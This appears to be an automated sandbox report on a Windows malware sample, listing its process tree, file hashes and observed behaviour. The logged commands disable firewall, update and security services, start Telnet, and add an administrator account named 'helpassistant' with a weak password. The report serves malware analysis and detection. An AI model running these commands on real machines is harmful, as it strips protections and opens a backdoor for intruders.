PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe

"C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\Windows\system32\Option.bat

C:\Windows\SysWOW64\UpdatAuto.exe

C:\Windows\system32\UpdatAuto.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\Windows\system32\Option.bat

C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe

e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3000 -s 152

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop sharedaccess

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wuauserv

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wscsvc

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop srservice

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net start TlntSvr

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net user helpassistant 123456

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net localgroup administrators helpassistant /add

C:\Windows\SysWOW64\sc.exe

sc config srservice start= disabled

C:\Windows\SysWOW64\sc.exe

sc config SharedAccess start= disabled

C:\Windows\SysWOW64\sc.exe

sc config wuauserv start= disabled

C:\Windows\SysWOW64\sc.exe

sc config wscsvc start= disabled

C:\Windows\SysWOW64\sc.exe

sc config srservice start= disabled

C:\Windows\SysWOW64\net.exe

net stop wuauserv

C:\Windows\SysWOW64\net.exe

net stop sharedaccess

C:\Windows\SysWOW64\net.exe

net start TlntSvr

C:\Windows\SysWOW64\net.exe

net stop wscsvc

C:\Windows\SysWOW64\net.exe

net user helpassistant 123456

C:\Windows\SysWOW64\net.exe

net localgroup administrators helpassistant /add

C:\Windows\SysWOW64\net.exe

net stop srservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TlntSvr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop sharedaccess

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wuauserv

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user helpassistant 123456

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup administrators helpassistant /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop srservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wscsvc

Network

N/A

Files

C:\Windows\SysWOW64\Option.bat

MD5 1d04abf39e9df55eed1d04430cc21eb8
SHA1 b8292861dfd4e046eb9625e1571cc08c26094d41
SHA256 0bc485263cf8a962e64db0b88f156f2a9af1b81ecfdb1cf9111d497e85df70f3
SHA512 a2cccc03dadecf6a298b274a6735675aeec1cc280f84432498e9df31aa4a543d2557a2fd06bac4fc8778a774b30bbd31f91c1d0d3ace480b6217654c8d63a7d0

\Windows\SysWOW64\UpdatAuto.exe

MD5 c71e745a2d45cb7353c7f527c97c9115
SHA1 15499d15a6ecbd60ab2723c9b61e5e5afc84048c
SHA256 eaf3e2e75aa573c24dfc588b5cc697b1288c826b12f8435d87fabb8a47312906
SHA512 517964a4654f8103330fdb514220eddef69efdfdcc39f70c44f4dd5af1a34175eeaeaf3e1d6224141063a1603a3bdd1e88977c29e6726ecf34ccb4f16bdd93c2

\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe

MD5 72d5165e0744f25f33618830f5fff579
SHA1 a4138dc2ff4eb6e62ce3b7d0891931062bd63de7
SHA256 814cc0aa61ca1827c3c38a4619b974db6c7325c41cb1facd6aec57fd97c54fc8
SHA512 59a2cd04cfc3c329d0e198e32c91ec2911e5d24caf1f1afbfe1dde52700d9e89f82c289b9deed1d819f6265e897f3f5e75ba45cab05b0b0570245fadc39d1cb9

\??\c:\ntldr~6

MD5 21716a6ee5e2a256e86c6a8d7f6a4ae9
SHA1 6428a8a62ef98543997e80e4421299cab596cf03
SHA256 caed0162d36522aa92f502df0be9c384c53210e16b7103ff72cbe07de40d96be
SHA512 baeed1334c703c97951eeace988993bb6c57ca2e9acbd2ccf389d417c38357b6dfa1e73e689fc3400472914acc002bb38c2ca77e0836bf069f8600409eea0543

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe

MD5 4c413e3b21898c286e1523a58b7d78b0
SHA1 e27f2db280a7982adbbf7b6c7b206259efe6287e
SHA256 65c79f2fe5f49ee89aab6514e8f10f77c60b3c6cbb93d747823fabcde5fee753
SHA512 4e3f6584c191ae49a4704811165044c4f6ba00acc98b077ec619ed3e60c47a774b6eff455ec58edf174676927a5954f14922b9c0cbf54073d47b2174bcb6ce92

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\setup.exe

MD5 87bcba5a8da612b971b56289eacb28d3
SHA1 e1584dd349715ad8ba2c942839010b2d4c2f5a61
SHA256 bacff00775b232d0dcafe690c8796473a8e1a4a05858e2faf35efea59f57325c
SHA512 00a94693f909dc7347d98d19800c7e2ba50430840da07ad5ec2c1c7a665bd28d39193e4e761e7fee689e64ffb6d4cfc1402f70e3367fbd5c6040aeba9aa4ce79

\??\c:\ntldr~6

MD5 241de30333dffd42338d40e889f94f2b
SHA1 82b103568b4eb2f10a9038fb2949212ffc308332
SHA256 6460f95666e9d89a4cdf87724bc9472f999a8bd5c658fb6e4fddb5d6e17ff5ca
SHA512 69942ff4c241cc34df6c1e508fa4c2d5101005463cb55b0acc16154daf80d6fc37f3d8c070b5b8cbe2670e634e70231efe50d94ef75b7dbef6622a98dd117dcf

C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\DW20.EXE

MD5 d62e5dde55362fa2b9040d97f4b21617
SHA1 4b1c45c1d2d05155730c941601fee5933c2975dd
SHA256 f6b963b22617c6367c952686878d825ba1849022efadb37b6d9414c6cfc70bdb
SHA512 80294307d9255411c66e4ce0bea08b81b0c8aa84ea294440be363fdc823ff7debc55711b0393aab02ff32da2fa76410f88935b594b68dab80be4ee84acead3d8

\??\c:\ntldr~6

MD5 f5130fdefb6f23dfd05e4d040866c767
SHA1 1ade5c56ea2c56ac4ad64c22322f6a70c85a6ec6
SHA256 9039999a2a70bec7720104bdafd72106eea12027bdd38bb591b166fb79bfea90
SHA512 4e826ddc9d79eaa7a088f880dcc9f1bad32c56e86fb90ce1846148af9204e7262f791359f3f9e5e34d9e2fd22b6eacd647c9ac3e490679f6bdaa5ca7ccd6a938

C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\dwtrig20.exe

MD5 1ec6cef196a2cc5e53afe8128aeb6222
SHA1 fe7d4d9c369f18f27af56dc7ae411ed3ae9719a6
SHA256 768394fb22a3c284cb2bd912ddc4cab87f4d9348e04d34d7a65e113398d02389
SHA512 beb8ce21c583c24547a8d051c2a1a9b502ac5cb5049e1ed18109cb69571b1bd6758b32d2e6e6fd6f8a865eb8e151e38ac8060ec07b3b871a7940d469f230a64f

\??\c:\ntldr~6

MD5 bfe2d9ad74641ee0a66c2e59f937c8a7
SHA1 d1b58cfd1cf4ef3636a7e207bec8dead293e7fa7
SHA256 62ed9dcefebd9bedbe31654fd063b6dd33b99c2ad9e4f6a667ed3c9266870d1e
SHA512 532271a139d16a8dcc63546f6a1d421ef20be8323ad0284166285519f71de74868ca379dc08670d08e2651dbb820797f54220cfb79224e4566a710e9f081b49b

C:\Program Files\7-Zip\7z.exe

MD5 075bae8555a46d146a068619afa89475
SHA1 383758a12b560437d3463b88cf29ed26002e2e07
SHA256 caeacad49ea8ff00c8cbe6132c1dec74132b475ef9e7548af0f0ecf3e9c11deb
SHA512 c6ed575c430dbf42897e74821999eda99f063941fda0f5db5a9bba91ce44e0bbed1ef7173ffb3c4dccc6638918f107d88d9c20c8d830accd638ded11d2beea7a

\??\c:\ntldr~6

MD5 b835cea5d0100a77d466f66774bcd561
SHA1 2b14e493947a239eeecbb657215d4de97d610975
SHA256 30e568425d70e4daabdfe869fa23e5c1afcd973d5697b8456bdfc8a14b23c1fb
SHA512 d6e0be7ad2037eebb4cf1836983384e6589c03fc95e00d5c430c3e1f99595ef474c4403db4557864a0ce0f4c391a4ea083f82abd2514c3c5ed4dfae5dab6520e

\??\c:\ntldr~6

MD5 a44d848a6a230a19c1f7de013c27aac5
SHA1 eeac29ced48b07eb22e14da6315d0802de3c15a8
SHA256 b6b063266d5a981157cac9850c100293e384f78da21e895e2cc56a13b17cd0c6
SHA512 087cdf15b087deb75a1990371dff4312d6d4bdc0c5f6cabf08c721c2d77148fb705e2cf8efafab196bcb0d8a66c9f243f487dfd5133ad82895582025ff8195a0

C:\Program Files\7-Zip\7zFM.exe

MD5 23be8ddc868a2377798ffe7de1b56a13
SHA1 1973f858b150bbd5603424b3ee226ee9d00816a9
SHA256 7be5144a63c7eb896be6838d7cd5aeb1ed3a2776f65f68b36251fb684630d4fe
SHA512 2ebbf60a4594a1533028d8afb8b96b958d932a50bc68b881cfd2609dac23dddb79452351fcee9bcfdf204ca877921549271b013b869264bf3b6be7f6be54670c

\??\c:\ntldr~6

MD5 ba49ead4efa59142823318dd6cf15630
SHA1 a9aca19c8713b653bbea2a3636bd7cc525b610a9
SHA256 ee0224247a20d639124a3971598102b42adb480a7a3a4d411f3735d9439b9e69
SHA512 e21194883952f7464ddc6a3a60b28d39d3847e8ea8a24f4a3eaa1cfda2e5e2fa77f3fef7d05dc4b13e747e2d522c482dddc45ca2dd0e094286be050b371784b7

\??\c:\ntldr~6

MD5 9054016f7639c4d31f001dd4efb74c32
SHA1 3c32843754d426740907ae3aee3d87e0ed820d71
SHA256 14b822a3d3e15ad8d6e5724c9b892804a3033f234452bb427c63ba354e602157
SHA512 46bd95e22720fb8ace602aeee98e0a2dc14bce80947c12a61cc4a945f8c3cd703837469b49403ca9f1bad15cda1ea45437264fba1ebe8e30eababafeec3f05b8

C:\Program Files\7-Zip\7zG.exe

MD5 9fd5b9cb0adc45ab38d170e9310296ef
SHA1 c61a8ac00c1f840fb19c54a3914f42bd2c49c27d
SHA256 5af29262f05990185ccc0e9d46699d6a7b248dce946057da392c793852d055ab
SHA512 6e3505d2013d3b9198cb8b9e8086dd21e553e8a4dad31f246a88fb9f06a21a1c0f978f44b33fb2ee8a90afe1dcebbf2e14d6a10309345b3a4cfc414f5a37e5a5

\??\c:\ntldr~6

MD5 0a98cb06c8752ba15965b76e6ec2932d
SHA1 911d2d5db9c1c72d7e2eacaa43d1f1c11652a561
SHA256 963d28b69affbb2c9880e3217e9ca72010be8002dbe7f1a3bda4121016f3f50e
SHA512 3b9509fd3e81f22d2c5e1e7c68ad7fd2d2f0fb2049e2263bb14fb3cb8431eed06c4b49665b73b95817f6369fb278718de17de13422b0b8bead9ac77a569ac72e

C:\Program Files\7-Zip\Uninstall.exe

MD5 c8a418ea7bb8e581ec3b3b704e391f6a
SHA1 4cc9f089d75de54d10d6ec2714b7c80ba1c9891a
SHA256 c9798728c1ed0e072387a16faeb51c82b902d995c2e663b7d9d221c1bd85f01a
SHA512 ad70fc1848b97458a032fcfef5da0b890c2dcdbff5582598bbaeb0182c6236b95596ba556821a9f053c2e6c21e5293f4ce35f8a21a2ab2ac77e368225bbdf197

\??\c:\ntldr~6

MD5 86cf0d50d0f2057e609edffafad2fe83
SHA1 6278efc66dfd2a1c470d184a78469782a4056b8e
SHA256 dc60229c74a6f976f88d5d77f20ede4fe9a2739784d434b92b9855de39b78b2c
SHA512 4c473206b13fb430bf87d97cad928bcc2616aec1f04091482186c4e3a0c6823b70460961650260bf7fbb3b1de87b543da1075869e583ca31da701883cd30a6f2

\??\c:\ntldr~6

MD5 2a684cad952811f2d23412c285db857b
SHA1 7c9f09a4e2b0833fa68c5e36497b6e09648779c9
SHA256 e13e23f8dcc345df7aea2019911c57241be5ae4de478b1443b223f5a2289188a
SHA512 d68fab1f9ed117ef8fb2b1a771955ae42e7f1780a4b7e76b69c7e2faa887447ccba172938eaa83773249cf0a2b9d6f8fe430f4e226d04bfa3ea44632e31bf0e5

C:\Program Files\Google\Chrome\Application\chrome.exe

MD5 f05d050f82032d0f994eadb2bd6e1e31
SHA1 2ed5acc6b469d5823363b68f231d6df19206fee3
SHA256 9cd91b194b311d2bd8da6be3637704c6202e83ac521f7f84fda5e60d43f5be6e
SHA512 b11c345d5bd4c33d5cc59e6e83f5f9efab289b36a61d6308187a0f3018f5ac981c38ad0f6369b435531538cebc6023da79fe3370b66fe829af0d0138d05ecb74

C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

MD5 e48e8a5a7f8eedbc9797ea6a2805e1a1
SHA1 cce28d6fcaec7e2136fdd5f75b05d184271db9f6
SHA256 45e5f614881dcae4c8a5d7e82b163e7548d701c0a9b4fe3109303e1ffdcf8481
SHA512 915ab8ccf1b7cee042c4019343bd38ab25b37da5ba69663a818301fbddcfccbc97a9450ec479a08d0395d9c8698dc5cf36ce992323c184bad20687e896ba09f1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe

MD5 09d63f6304b612039e523a6ba103d114
SHA1 eb7848729c139cf0df778cdfbdfa0319f34e9cff
SHA256 0a7835ffb50407e2f6446a5fab58dc8336906afd0bbd7b8d0f55303f5a344b74
SHA512 9d3dca9143bdd5787efe3ef4078bace776bde10578545db1abdb2890ea28688a0dda327343afc63c0af4045a1ce1a1e5470862aeb9450c2db6c4cd2d87ae3858

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

MD5 1f1688e9f122140daccc50515366d328
SHA1 f566185fae0f4ea80d7bb33ca1b020cf8bca086e
SHA256 b1534fbe01547c61412045390079bb21add15a9fd98926d2bb5eb2cc1372c6c2
SHA512 4f74aa9f58f95ae801f95b9a65f47ab76438fcdb326ffc685df96342cadc85b640febe8909e6a8494519fa85259ff51635dc1f827ab6cb461ec037f2f7f8fe0e

\??\c:\ntldr~6

MD5 0175e4799bd7d164ccd2e04f446340ac
SHA1 9193f00626d66b931621fe0c75bdaae32d307cfd
SHA256 e8301bb49866edfa35d54ae5cd0f334408e4727beff45a3c9047ea2334df6ddf
SHA512 f8aec97617856e614bdf8f64fcc14d842f60e1da4d853bde79d4322567c79caee90b487b303b338b3acbe9c69ab8729a3032e5526ebd208ef728cddcc48ffa53

C:\Program Files\Google\Chrome\Application\106.0.5249.119\notification_helper.exe

MD5 38dd746f51be919372861025b0a120b4
SHA1 9bd6b1d1faffe764a64cff7b27fe3eca11eeddba
SHA256 ee7cdb25d88fe649ef0ebfccda0bb406b92a48c20476611a220c4ece4dbe0170
SHA512 1235ba827dc1fc065f43a06dc0f926ad98a65a664dfdf873a1b27889ff519cfced8fe2df653555d73a8c9dff405c2c0f82bc7a3fc17fb027b84a6205d81b6be5

C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe

MD5 78f556b393481777246a15db34aa8d27
SHA1 7bf105c6d8d43203f7f7e060bf60446c835b63cd
SHA256 7a864ca0e14126a2eb1bb67ea8b368cdecc2da8c0e7e523f7543ef075eaf385e
SHA512 3786e4ddd0f68c6b875b9c08ad9c15e82d3601cef6f98bed6d94c12a9b8547453d884f71c2d89ffd37f54f2d0407504d12124e9f6a63919c1c379cff440d542a

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-03 05:22

Reported

2024-11-03 05:25

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe"

Signatures

Disables service(s)

evasion execution

Grants admin privileges

Network Share Discovery

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\Option.bat C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File created C:\Windows\SysWOW64\Option.bat C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Windows\SysWOW64\UpdatAuto.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdeps.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javap.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaw.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaw.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\idlj.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jcmd.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\ktab.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\klist.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jrunscript.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jmap.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdeps.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javapackager.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jar.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\7-Zip\7zG.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javap.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jmap.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jar.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\pack200.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jjs.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jps.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmic.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jjs.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\dotnet\dotnet.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\serialver.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\7-Zip\Uninstall.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\java.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsimport.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\keytool.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaws.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\dotnet\dotnet.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmiregistry.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsgen.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
